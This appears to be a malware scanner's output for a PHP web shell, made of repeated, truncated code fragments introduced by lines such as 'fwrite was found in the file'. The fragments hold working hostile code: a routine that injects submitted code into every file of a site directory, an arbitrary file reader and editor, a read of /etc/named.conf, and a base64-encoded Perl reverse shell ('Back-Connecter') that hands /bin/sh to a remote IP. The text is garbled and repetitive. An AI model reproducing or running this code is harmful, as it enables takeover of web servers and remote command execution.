:(($_62756ced6cca & 0x0200) ? 'T' : '-'));return $_c889a0d2bbd1;}foreach($_19eaea116b65 as $_fb685115b91f=>$_e3beccd8d39e){ if($_e3beccd8d39e == '' && $_fb685115b91f == 0){ $_3c0a4563959e = true; echo '<a href='?file_manager&path=/'>/</a>'; continue; } if($_e3beccd8d39e == '') continue; echo '<a href='?file_manager&path='; for($_bad1b53b4fbb=0;$_bad1b53b4fbb<=$_fb685115b91f;$_bad1b53b4fbb++){ echo '$_19eaea116b65[$_bad1b53b4fbb]'; if($_bad1b53b4fbb != $_fb685115b91f) echo '/'; } echo ''>'.$_e3beccd8d39e.'</a>/';}echo '</td></tr><tr><td>'; if(isset($_GET['filesrc'])){ echo '<tr><td>Current File : '; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'212: <textarea cols=80 rows=20 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f33fopen was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose(326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfbfwrite was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File 277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894fclose was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File Done.</font><br />'; }else{ echo '<font color='red'>Edit File Error.</font><br />'; } fclose($_ba2773181c57); } echo '<form method='POST'>277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dfile_get_contents was found in the file bizhbjpehw.php 139: <font style='color: lawngreen; font-family: cursive; font-size: 130%;'>Domains: <?php if(strtolower(substr(PHP_OS,0,3)) == 'win') {$_f3d329025a5d = 'win';}else {$_f3d329025a5d = 'nix';}if($_f3d329025a5d == 'nix') {$_1a1142d4b381 = @file_get_contents('/etc/named.conf');if(!$_1a1142d4b381) {$_b9c59d921b4e = 201: <tr><td><font style='color:white;'>Current Path : ';$_d586cea720c2 = getcwd();$_d586cea720c2 = str_replace('\\','/',$_d586cea720c2);$_19eaea116b65 = explode('/',$_d586cea720c2);function permsa($_db30bcba387e){$_62756ced6cca = fileperms($_db30bcba387e);if (($_62756ced6cca & 0xC000) == 0xC000) {$_c889a0d2bbd1 = 's';} elseif (($_62756ced6cca & 0xA000) == 0xA000) {$_c889a0d2bbd1 = 'l';} elseif (($_62756ced6cca & 0x8000) == 0x8000) {$_c889a0d2bbd1 = '-';} elseif (($_62756ced6cca & 0x6000) == 0x6000) {$_c889a0d2bbd1 = 'b';} elseif (($_62756ced6cca & 0x4000) == 0x4000) {$_c889a0d2bbd1 = 'd';} elseif (($_62756ced6cca & 0x2000) == 0x2000) {$_c889a0d2bbd1 = 'c';} elseif (($_62756ced6cca & 0x1000) == 0x1000) {$_c889a0d2bbd1 = 'p';} else {$_c889a0d2bbd1 = 'u';}$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0100) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0080) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0040) ?(($_62756ced6cca & 0x0800) ? 's' : 'x' ) :(($_62756ced6cca & 0x0800) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0020) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0010) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0008) ?(($_62756ced6cca & 0x0400) ? 's' : 'x' ) :(($_62756ced6cca & 0x0400) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0004) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0002) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0001) ?(($_62756ced6cca & 0x0200) ? 't' : 'x' ) :(($_62756ced6cca & 0x0200) ? 'T' : '-'));return $_c889a0d2bbd1;}foreach($_19eaea116b65 as $_fb685115b91f=>$_e3beccd8d39e){ if($_e3beccd8d39e == '' && $_fb685115b91f == 0){ $_3c0a4563959e = true; echo '<a href='?file_manager&path=/'>/</a>'; continue; } if($_e3beccd8d39e == '') continue; echo '<a href='?file_manager&path='; for($_bad1b53b4fbb=0;$_bad1b53b4fbb<=$_fb685115b91f;$_bad1b53b4fbb++){ echo '$_19eaea116b65[$_bad1b53b4fbb]'; if($_bad1b53b4fbb != $_fb685115b91f) echo '/'; } echo ''>'.$_e3beccd8d39e.'</a>/';}echo '</td></tr><tr><td>'; if(isset($_GET['filesrc'])){ echo '<tr><td>Current File : '; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'212: <textarea cols=80 rows=20 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f33fopen was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose(326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfbfwrite was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File 277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894fclose was found in the file bizhbjpehw.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File Done.</font><br />'; }else{ echo '<font color='red'>Edit File Error.</font><br />'; } fclose($_ba2773181c57); } echo '<form method='POST'>277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dfile_get_contents was found in the file bizhbjpehw.php 139: <font style='color: lawngreen; font-family: cursive; font-size: 130%;'>Domains: <?php if(strtolower(substr(PHP_OS,0,3)) == 'win') {$_f3d329025a5d = 'win';}else {$_f3d329025a5d = 'nix';}if($_f3d329025a5d == 'nix') {$_1a1142d4b381 = @file_get_contents('/etc/named.conf');if(!$_1a1142d4b381) {$_b9c59d921b4e = 201: <tr><td><font style='color:white;'>Current Path : ';$_d586cea720c2 = getcwd();$_d586cea720c2 = str_replace('\\','/',$_d586cea720c2);$_19eaea116b65 = explode('/',$_d586cea720c2);function permsa($_db30bcba387e){$_62756ced6cca = fileperms($_db30bcba387e);if (($_62756ced6cca & 0xC000) == 0xC000) {$_c889a0d2bbd1 = 's';} elseif (($_62756ced6cca & 0xA000) == 0xA000) {$_c889a0d2bbd1 = 'l';} elseif (($_62756ced6cca & 0x8000) == 0x8000) {$_c889a0d2bbd1 = '-';} elseif (($_62756ced6cca & 0x6000) == 0x6000) {$_c889a0d2bbd1 = 'b';} elseif (($_62756ced6cca & 0x4000) == 0x4000) {$_c889a0d2bbd1 = 'd';} elseif (($_62756ced6cca & 0x2000) == 0x2000) {$_c889a0d2bbd1 = 'c';} elseif (($_62756ced6cca & 0x1000) == 0x1000) {$_c889a0d2bbd1 = 'p';} else {$_c889a0d2bbd1 = 'u';}$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0100) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0080) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0040) ?(($_62756ced6cca & 0x0800) ? 's' : 'x' ) :(($_62756ced6cca & 0x0800) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0020) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0010) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0008) ?(($_62756ced6cca & 0x0400) ? 's' : 'x' ) :(($_62756ced6cca & 0x0400) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0004) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0002) 